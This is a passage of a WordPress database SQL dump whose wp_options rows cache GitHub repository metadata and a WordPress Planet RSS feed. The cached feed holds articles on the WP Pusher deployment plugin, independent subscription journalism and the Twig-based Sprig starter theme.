/mojo-marketplace-wp-plugin/commits{/sha}\";s:15:\"git_commits_url\";s:82:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/git/commits{/sha}\";s:12:\"comments_url\";s:82:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/comments{/number}\";s:17:\"issue_comment_url\";s:89:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/issues/comments/{number}\";s:12:\"contents_url\";s:81:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/contents/{+path}\";s:11:\"compare_url\";s:88:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/compare/{base}...{head}\";s:10:\"merges_url\";s:71:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/merges\";s:11:\"archive_url\";s:87:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/{archive_format}{/ref}\";s:13:\"downloads_url\";s:74:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/downloads\";s:10:\"issues_url\";s:80:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/issues{/number}\";s:9:\"pulls_url\";s:79:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/pulls{/number}\";s:14:\"milestones_url\";s:84:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/milestones{/number}\";s:17:\"notifications_url\";s:104:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/notifications{?since,all,participating}\";s:10:\"labels_url\";s:78:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/labels{/name}\";s:12:\"releases_url\";s:78:\"https://api.github.com/repos/mojoness/mojo-marketplace-wp-plugin/releases{/id}\";s:10:\"created_at\";s:20:\"2014-01-27T19:47:10Z\";s:10:\"updated_at\";s:20:\"2014-12-18T18:39:28Z\";s:9:\"pushed_at\";s:20:\"2014-12-18T19:57:17Z\";s:7:\"git_url\";s:56:\"git://github.com/mojoness/mojo-marketplace-wp-plugin.git\";s:7:\"ssh_url\";s:54:\"git@github.com:mojoness/mojo-marketplace-wp-plugin.git\";s:9:\"clone_url\";s:58:\"https://github.com/mojoness/mojo-marketplace-wp-plugin.git\";s:7:\"svn_url\";s:54:\"https://github.com/mojoness/mojo-marketplace-wp-plugin\";s:8:\"homepage\";N;s:4:\"size\";i:1125;s:16:\"stargazers_count\";i:2;s:14:\"watchers_count\";i:2;s:8:\"language\";s:3:\"PHP\";s:10:\"has_issues\";b:1;s:13:\"has_downloads\";b:1;s:8:\"has_wiki\";b:1;s:9:\"has_pages\";b:0;s:11:\"forks_count\";i:1;s:10:\"mirror_url\";N;s:17:\"open_issues_count\";i:2;s:5:\"forks\";i:1;s:11:\"open_issues\";i:2;s:8:\"watchers\";i:2;s:14:\"default_branch\";s:6:\"master\";s:5:\"score\";d:19.81725300000000089539753389544785022735595703125;}}}", "yes");
INSERT INTO `wp_options` VALUES("171", "_site_transient_timeout_ghu-cd60ad3e4bd0d8706fc4a4f35f398ee5", "1422925733", "yes");
INSERT INTO `wp_options` VALUES("172", "_site_transient_ghu-cd60ad3e4bd0d8706fc4a4f35f398ee5", "no tags here", "yes");
INSERT INTO `wp_options` VALUES("173", "_site_transient_timeout_ghu-9bb54241f94b24d969f7f1e4865eb9ed", "1422925733", "yes");
INSERT INTO `wp_options` VALUES("174", "_site_transient_ghu-9bb54241f94b24d969f7f1e4865eb9ed", "O:8:\"stdClass\":2:{s:7:\"message\";s:9:\"Not Found\";s:17:\"documentation_url\";s:31:\"https://developer.github.com/v3\";}", "yes");
INSERT INTO `wp_options` VALUES("179", "_transient_timeout_feed_867bd5c64f85878d03a060509cd2f92c", "1422965334", "no");
INSERT INTO `wp_options` VALUES("180", "_transient_feed_867bd5c64f85878d03a060509cd2f92c", "a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"WPTavern: WP Pusher Aims to Provide Pain-Free Deployment of WordPress Themes and Plugins from GitHub\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38339\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"http://wptavern.com/wp-pusher-aims-to-provide-pain-free-deployment-of-wordpress-themes-and-plugins-from-github\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6728:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher.png?resize=680%2C312\" alt=\"wp-pusher\" class=\"aligncenter size-full wp-image-38342\" /></a></p>\n<p>If you create plugins and themes for clients and host them on GitHub, then you may have encountered the hassle of having to move those files over to your client&#8217;s installation. On super cheap hosting packages, where SSH access is not an option, this process inevitably requires manually copying files over via FTP.</p>\n<p>This is the problem that Danish developer <a href=\"http://petersuhm.com/\" target=\"_blank\">Peter Suhm</a> aims to solve with his new <a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> product. The plugin aims to bring pain-free deployment of WordPress themes and plugins directly from GitHub and Bitbucket.</p>\n<p>&#8220;If you happen to be an actual developer, I guess you have a few preferences as to how you manage and deploy your code,&#8221; Suhm said. &#8220;I’m talking about stuff like version control and automated deployment scripts. Good luck with that on your clients&#8217; cheap-ass shared hosting account.&#8221;</p>\n<p>Suhm developed WP Pusher with the vast majority of cheaply-hosted WordPress sites in mind. Additionally, he wanted to eliminate some of the hangups with more expensive hosts. &#8220;Even if you are running a shiny new VPS and have SSH access, Git installed and you think all is well, soon you’ll realize other weird things,&#8221; he said. &#8220;You can&#8217;t have symlinks in your /plugins folder just to mention one.&#8221; WP Pusher gets around these limitations via a simple plugin that does not require Git or SSH.</p>\n<h3>How Does WP Pusher Work?</h3>\n<p>Once installed, WP Pusher allows you to install and manage all of your GitHub or Bitbucket-hosted plugins in one central dashboard in the admin. Enabling the Push-to-Deploy feature will have your code update itself automatically every time you push to GitHub or Bitbucket.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/manage-wp-pusher-themes.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/manage-wp-pusher-themes.png?resize=1025%2C202\" alt=\"manage-wp-pusher-themes\" class=\"aligncenter size-full wp-image-38352\" /></a></p>\n<p>The plugin supports private repositories in its free edition and includes support for branches in the <a href=\"https://wppusher.com/#licenses\" target=\"_blank\">Pro version</a>.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher-install-plugin.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher-install-plugin.png?resize=1025%2C651\" alt=\"wp-pusher-install-plugin\" class=\"aligncenter size-full wp-image-38353\" /></a></p>\n<p>WP Pusher is essentially an extension of the built-in auto updater in WordPress, which Suhm explained in the plugin&#8217;s release <a href=\"http://blog.wppusher.com/pain-of-wordpress-development/\" target=\"_blank\">post</a>:</p>\n<blockquote><p>After a lot of prototyping, and hacking around with the WordPress core, we came up with a smart solution. By utilizing the WordPress core upgrader classes, we could solve the problem in a really clean way. </p>\n<p>Since WordPress already knows how to pull stuff from a remote source and install it, we realized that by working together with WordPress, instead of just throwing random automated SSH and FTP scripts at the server, we could just have WordPress do the work for us -with a lot of tweaking of course. In the end, our solution doesn&#8217;t do anything that is not native to WordPress. It’s all core functionality.</p></blockquote>\n<p>WP Pusher does everything in the plugin and does not require shell access. It communicates with GitHub via a token stored on your server and operates using WordPress&#8217; core updater capabilities.</p>\n<h3>Different Approaches to Managing WordPress Projects with Git</h3>\n<p>In order to use WP Pusher, each GitHub-hosted plugin and/or theme will need to be in its own repository. While beta testing WP Pusher, Suhm found that developers have <a href=\"http://blog.wppusher.com/managing-wordpress-projects-with-git/\" target=\"_blank\">differences in how they manage WordPress projects with Git</a>. The most common one he&#8217;s encountered is <em>one installation, one repository</em>, where the entire WordPress installation, including themes and plugins, is under Git control. Suhm believes that this approach is fundamentally broken, given that it requires you to keep a lot of 3rd party code under version control.</p>\n<p>WP Pusher operates under a &#8220;<em>one package, one repository</em>&#8221; approach where each theme or plugin is its own entity. This method also offers the advantage of being able to share theme/plugin code across multiple projects.</p>\n<p>&#8220;WordPress relies heavily on the auto updater, which would make your version control a mess,&#8221; Suhm explained. &#8220;If you do have something that is more enterprise than most WordPress setups, you should consider a custom setup that allows better for version control of core. Packages should still, in my opinion, each have their own repositories, since they are logically their own entities.&#8221;</p>\n<p>WP Pusher is structured around this approach for managing WordPress projects with Git. You may need to restructure some of your repositories if you want to be able to use the plugin.</p>\n<p>The free version offers unlimited themes and plugins, unlimited repositories, and support for both GitHub and Bitbucket. It does not, however, include email support. WP Pusher is compatible with WordPress multisite and will show up in the network admin when activated. It doesn&#8217;t currently support Composer but Suhm is <a href=\"https://twitter.com/WP_Pusher/status/558356082960371713\" target=\"_blank\">considering adding it in the future</a>. The plugin is released under the GPLv2 license.</p>\n<p><a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> offers a unique take on maintaining version control for projects while not forcing WordPress to bend over backwards to provide it in the admin. It leaves the version control to GitHub and/or Bitbucket and uses WordPress simply for deployment.</p>\n<p>Setup is simple and the plugin will work virtually everywhere, even on the cheapest hosting. If you like the idea of maintaining version control on a plugin/theme basis, you can download the WP Pusher plugin for free from the project&#8217;s <a href=\"https://wppusher.com/\" target=\"_blank\">website</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 22:32:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Post Status: New journalism\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=8311\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"https://poststatus.com/new-journalism/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:13584:\"<p>Have you heard of Andrew Sullivan? He&#8217;s the man behind The Dish &#8212; a blog that helped break new ground on blog monetization through membership fees.</p>\n<p><a href=\"http://dish.andrewsullivan.com/2015/01/31/a-note-to-my-readers/\">He quit blogging</a>, and therefore the media world declared blogging dead (again). Sullivan leaving and the posts that have come from it have caused me to think about blogging and journalism in its current and changing state. I think we&#8217;re in the second act of what I&#8217;m pompously calling <em>new journalism</em>.</p>\n<h3>Blogging is so (not) dead</h3>\n<p>Seemingly everyone in media weighed in on Sullivan&#8217;s departure, from <a href=\"http://www.buzzfeed.com/bensmith/this-is-my-blog\">Ben Smith</a> at Buzzfeed to <a href=\"http://www.vox.com/2015/1/30/7948091/andrew-sullivan-leaving-blogging\">Ezra Klein</a> at Vox. My favorite (until today) was Mathew Ingram&#8217;s <a href=\"https://gigaom.com/2015/01/31/blogging-is-very-much-alive-we-just-call-it-something-else-now/\">take at Gigaom</a>, which mostly defended the blog.</p>\n<p>But the best of the bunch goes to former Automattician and current independent tech journalist Ben Thompson. Ben runs <a href=\"http://stratechery.com/\">Stratechery</a>, a blog that has a very similar model to The Dish (and my own), where he makes money from subscribers who get extra members-only content.</p>\n<p>I have followed Ben&#8217;s work closely. I was quite keen to see how his model would work for him, and it has. Nevertheless, I almost fully agree with Ben&#8217;s take on what Sullivan&#8217;s model and departure mean:</p>\n<blockquote><p>It turns out, though, that there are more business models than simply advertising, as Sullivan himself sought to show. Sullivan was, for the last two years, supported by reader subscriptions to the tune of <a href=\"https://gigaom.com/2014/10/10/andrew-sullivans-daily-dish-sees-new-signups-fall-but-revenue-holding-steady-at-about-1m/\">nearly one million dollars a year</a>, and while many were skeptical of Sullivan’s efforts when he started, his ability to raise money shouldn’t have been a surprise: his is a singular voice – to put it in economic terms, Sullivan’s writing had a low <a href=\"http://en.wikipedia.org/wiki/Elasticity_of_substitution\">elasticity of substitution</a> – so people were happy to pay for something they couldn’t get anywhere else.</p></blockquote>\n<p>Elasticity of substitution may be my new favorite phrase. And in that concept, I think we find the important key to viability. What are we valuing in websites? For me, it&#8217;s individual voices.</p>\n<p>A bit more from Ben&#8217;s post:</p>\n<blockquote><p>But Sullivan did have a viable business, and it scaled wonderfully: it cost him the same amount of both time and money to serve 1,000 subscribers as it would have to serve 100,000, or 1 million, and he didn’t need to change a thing about himself or his content to do it. No, it’s not scale that is the problem, but rather <em>reach.</em></p>\n<p>I am, of course, acutely aware that there is a tradeoff when it comes to the subscription business model: by making something scarce, and worth paying for, you are by definition limiting your number of readers.<span> </span>Stratechery, though, serves a niche, and <a href=\"http://stratechery.com/2015/niches-problem-subscription-services/\">niches are best served</a> by making more from customers who really care than from milking pennies from everyone.</p></blockquote>\n<p>For a writer, it is a difficult mind-shift to focus on subscribers after years of focusing on reach. But I do think a subscriber model, or more likely a hybrid subscriber model, is perhaps one of the most viable routes for sustainable journalism that we have today.</p>\n<h3>New blogging mediums</h3>\n<p>Of additional interest to all of these &#8220;blogging is dead&#8221; posts, is how the writers define blogs and the mediums for them.</p>\n<p>Ben really narrows the definition of a blog.</p>\n<blockquote><p>A big problem with this entire discussion is that there really isn’t a widely agreed-upon definition of what a blog is, thanks in part to the rise of sites like TechCrunch that ran on WordPress and presented posts in reverse-chronological order and so, at least in the beginning, were called “blogs”; add to that the thinly-disguised PR-channels known as “company blogs” and it’s easy to get confused.</p>\n<p>And so, to be clear, when I speak of the “blog” I am referring to a regularly-updated site that is owned-and-operated by an individual (there is, of course, the “group blog,” but it too has a clearly-defined set of authors). And there, in that definition, is the reason why, despite the great unbundling, the blog has not and will not die: is is the only communications tool, in contrast to every other social service, that is <em>owned</em> by the author; to say someone follows a blog is to say someone follows a <em>person.</em></p></blockquote>\n<p>This is probably the single argument I (partially) disagree with. I actually believe that a blog is just that: <em>a web log</em>. I think it&#8217;s perfectly fine to consider Twitter, Facebook, &amp; Instagram new mediums for blogging &#8212; at least in the sense of the traditional <em>web log</em> definition. They are just for a different form of blogging: short form, temporary, and a viable replacement for the &#8220;10 to 15&#8243; daily update style of posts many old school bloggers previously put on their primary &#8220;blogs&#8221;.</p>\n<p>Other than someone abusing these mediums &#8212; for instance, Marc Andreessen&#8217;s tweet-storms &#8212; our WordPress (or other software) blogs are still where our more permanent thoughts go. And fortunately, as Ben notes, we have these short-form mediums as free marketing channels for our actual blogs and more serious thoughts.</p>\n<p>Ben also hesitates to consider multi-author sites as blogs. I disagree here as well. Perhaps publications aren&#8217;t blogs as a whole, but within TechCrunch or The New York Times, individuals rise up with their own unique voices, and those singular feeds are, in my opinion, blogs of their own &#8212; whether or not they are fully siloed within the publication. I can follow an author on Twitter and essentially get their blog feed through their Twitter links, even if the site itself doesn&#8217;t differentiate their posts from anyone else&#8217;s.</p>\n<p>So Ben has helped me establish a new mental constraint for defining a blog: <strong>a blog is a highly individual thing</strong>. I have never truly considered this before, but it makes sense. I&#8217;ve always been most attracted to publications where the voice behind the writing is strong &#8212; where I know who is writing a post whether I see the byline or not.</p>\n<h3>Publishing containers</h3>\n<p>The New York Times, TechCrunch, Politico and BuzzFeed: these are containers. They may have some over-arching styles that most of their writers follow, but we still get to know individuals in these publications. I know David Carr&#8217;s voice at The New York Times; I know Alexia Tsotsis&#8217; voice at TechCrunch; I know Mike Allen&#8217;s voice at Politico; and I know Ben Smith&#8217;s voice at BuzzFeed.</p>\n<p>One thing we&#8217;ve seen happen in a wake of <em>new journalism</em> is that a voice gets too big for the container, and the voice splits. Nate Silver left The New York Times. Ezra Klein left The Washington Post. Interestingly, I think both of these guys lost their voices a bit when they created their own containers.</p>\n<p>Andrew Sullivan is a great example of a big voice within publishing containers. Before he went independent, he was a huge voice at The Atlantic and The Daily Beast. He was apparently responsible for <a href=\"http://www.forbes.com/sites/jeffbercovici/2011/05/03/losing-andrew-sullivan-didnt-hurt-the-atlantics-traffic/\">up to a quarter</a> of all traffic to The Atlantic before he left.</p>\n<p>For a publisher, this should be both exhilarating and terrifying. The voice within your publication (Sullivan) gets outstanding results, but you also run the risk of the voice leaving; if the voice is bigger than the container, that could be really really bad.</p>\n<h3>We need new tools for a new kind of publishing container</h3>\n<p>Journalists are leaving big publishing containers and going independent for a variety of reasons, but I believe one is pretty clear: money.</p>\n<p>A niche publisher like Ben Thompson can make well into six-figures running his own publication. Ben is a talented and knowledgeable writer, but I don&#8217;t think it would be easy for him to make the kind of money he&#8217;s making at Stratechery if he were writing for a traditional publication.</p>\n<p>Ben cites the ease of use of tools like WordPress and Stripe as reasons to be optimistic that the independent subscription model can work:</p>\n<blockquote><p>While WordPress has long been an effective free option for managing the content-side of blogging, only recently are there useful tools for managing the business-side. First and foremost amongst these is Stripe which, for the first time makes managing subscription-payments simple and straight-forward. However, there are still holes, particularly when it comes to actually managing membership lists and communities</p></blockquote>\n<p>I agree that it&#8217;s easier than before, but I wouldn&#8217;t say it&#8217;s simple. I&#8217;ve spent a great deal of time to make Post Status work behind the scenes, and I don&#8217;t think it&#8217;s perfect by any means. Is it cheap compared to million dollar big-publisher platforms? Yes. Is it cheap for a solo-journalist? Not at all.</p>\n<p>I think there is a tremendous opportunity here: there is room to create new publishing containers (I&#8217;m not sure if this should be a tool or a network) that lower the technical barrier to entry but also enable independent, subscription-based journalism.</p>\n<p>Big media companies remove the need to manage the business and technical side for journalists. Meanwhile, those of us that are attempting our own thing are all reinventing the wheel a bit.</p>\n<p>Ben and I use some of the same tools &#8212; WordPress and Stripe &#8212; but what if there was a more structured container for those seeking independence and someone to help them take care of the non-content aspects? What if that same tool had its own network effect?</p>\n<h3>Who is in position to be a new kind of container?</h3>\n<p>What existing networks are in position to offer this kind of tool? WordPress.com is one. Medium is another.</p>\n<p>I envision a tool (publishing platform) where independent journalists can do a few things:</p>\n<ul>\n<li>Maintain their own audience (be a part of a network, but be their own voice and publication)</li>\n<li>Own their own brand (custom themes/styles, unique domain)</li>\n<li>Offer subscription options to readers without managing the tech</li>\n</ul>\n<p>If I were Ev Williams or Matt Mullenweg, I&#8217;d be working on a way to be the next container for great, <em>sustainable</em> journalism. And hosted networks have a unique advantage: they can offer discovery for new or lesser-known authors. Unless <a href=\"https://poststatus.com/notes/recommendation-engine-independent-wordpress-blogs/\">self-hosted options figure that part out</a>.</p>\n<p>As a publisher on the WordPress.org side of things, I don&#8217;t think the perfect tool exists yet either. Fortunately I&#8217;m able to build most of what I need. But Ben is right that managing membership lists  and communities with WordPress is still hard. Syncing the membership list and the email list (delivery mechanism) is hard too.</p>\n<p>While I don&#8217;t think the perfect self-hosted tools exist quite yet, I believe it&#8217;s just a matter of time. But even the best self-hosted tool will require that the journalist also manage the business elements; therefore I think there will always be room for a hosted tool.</p>\n<p>I think this could be an excellent business vertical for a publishing tool like <a href=\"http://wordpress.com\">WordPress.com</a> or <a href=\"http://medium.com\">Medium</a>.</p>\n<h3>New journalism</h3>\n<p>I&#8217;ve used the words <em>journalism</em> and <em>blogging</em> synonymously throughout this post. I don&#8217;t think all bloggers are journalists, but I do think all journalists are bloggers. Blogging isn&#8217;t dead. I think it&#8217;s just leaving adolescence.</p>\n<p>Journalists won&#8217;t need big media to back their efforts. They&#8217;ll be able to use a blend of mediums (Twitter, Instagram, Youtube, etc) to funnel traffic to their main &#8220;blog&#8221; &#8212; or primary domain &#8212; where they can actually make money by attracting loyal subscribers willing to pay for high-value content.</p>\n<p>The formula for making money will change. The key for successful independent journalism won&#8217;t be about being first, or dominating search, or pageview quotas. Too many in big media have ignored that <em>elasticity of substitution</em> measurement Ben highlights.</p>\n<p>Journalism is changing, and I agree with Ben Thompson that &#8220;The Daily Dish will in the long run be remembered not as the last of a dying breed but as the pioneer of a new, sustainable journalism.&#8221;</p>\n<p>Those journalists that can create what others cannot will have a formula for publishing success, and soon enough the tools will catch up to allow them to do what they do best: create great content.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 22:21:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: Sprig: A WordPress Starter Theme that Features the Twig Templating Engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37053\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"http://wptavern.com/sprig-a-wordpress-starter-theme-that-features-the-twig-templating-engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4167:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/sprig.png\" rel=\"prettyphoto[37053]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/sprig.png?resize=857%2C390\" alt=\"sprig\" class=\"aligncenter size-full wp-image-38303\" /></a></p>\n<p>Those who are new to WordPress theming are often confused by the mixture of PHP and HTML markup in templates. It&#8217;s easy to accidentally break theme functionality when everything is placed in the same file.</p>\n<p>For that reason, there&#8217;s a strong contingency of developers who prefer to integrate the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig</a> PHP templating engine with WordPress, using a starter theme or via plugins like <a href=\"https://wordpress.org/plugins/twigpress/\" target=\"_blank\">TwigPress</a>, <a href=\"https://wordpress.org/plugins/timber-library/\" target=\"_blank\">Timber</a>, or the like. Fans of Twig appreciate its concise syntax and find that it makes templates more readable.</p>\n<p><a href=\"http://sprigwp.com/\" target=\"_blank\">Sprig</a> is a new Twig-based starter theme for WordPress created by developer <a href=\"http://zach-adams.com/\" target=\"_blank\">Zach Adams</a>. The theme incorporates the power and flexibility of Twig templating to speed up development and make WordPress templates easier to edit.</p>\n<p>Here&#8217;s an example of what the WordPress loop looks like in Sprig:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">{% for post in posts() %}\n    {% include \'content/content-excerpt.twig\' %}\n{% endfor %}</pre>\n<p>For those who have never worked with a templating engine, the syntax may look rather unfamiliar, but the advantage is that it allows you to separate the necessities of getting/manipulating your data and rendering it out. Below is an example of the WordPress loop with arguments:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">\n{% for post in posts({\n    \'post_type\':\'post\',\n    \'posts_per_page\':4\n}) %}\n    {% include \'content/content-excerpt.twig\' %}\n{% endfor %}</pre>\n<p>&nbsp;</p>\n<h5>Sprig Features</h5>\n<p>Sprig utilizes Bower for frontend package management. It comes pre-loaded with either <a href=\"https://github.com/zach-adams/sprig\" target=\"_blank\">Bootstrap</a> or <a href=\"https://github.com/zach-adams/sprig-foundation\" target=\"_blank\">Foundation</a> to get started. Sprig uses <a href=\"http://gulpjs.com/\" target=\"_blank\">Gulp</a> to automate tasks such as compiling, concatenating, and minifying CSS and Javascript.</p>\n<p>The theme was developed using the best parts of <a href=\"http://underscores.me/\" target=\"_blank\">Underscores</a>, <a href=\"http://roots.io/starter-theme/\" target=\"_blank\">Roots</a>, and <a href=\"https://wordpress.org/plugins/twigpress/\" target=\"_blank\">TwigPress</a>, which bring in a number of additional functions and scripts useful for theme development.</p>\n<h3>Does Twig Introduce a New Layer of Abstraction?</h3>\n<p>The main argument some theme developers have against using a templating engine like Twig is that it introduces a new layer of abstraction, as well as another thing to learn on top of WordPress&#8217; usual way of structuring template files. Some believe that the <a href=\"http://en.wikipedia.org/wiki/Separation_of_concerns\" target=\"_blank\">separation of concerns</a> prohibits a theme developer from gaining a true understanding of how WordPress works.</p>\n<p>Adams clearly states that the purpose of Sprig is to help theme developers spend less time wading through template markup code and instead focus their efforts on creating beautiful themes. The Twig templating engine may not be your cup of tea, but many developers find that it helps them produce cleaner template code that is easier to reuse.</p>\n<p>If <a href=\"http://sprigwp.com/\" target=\"_blank\">Sprig</a> helps get you from here to there faster, then it might be worth incorporating into your theme development workflow. Check out the full <a href=\"https://github.com/zach-adams/sprig\" target=\"_blank\">documentation on GitHub</a>. The project is still under active development and Adams recommends you test Sprig heavily before using it in 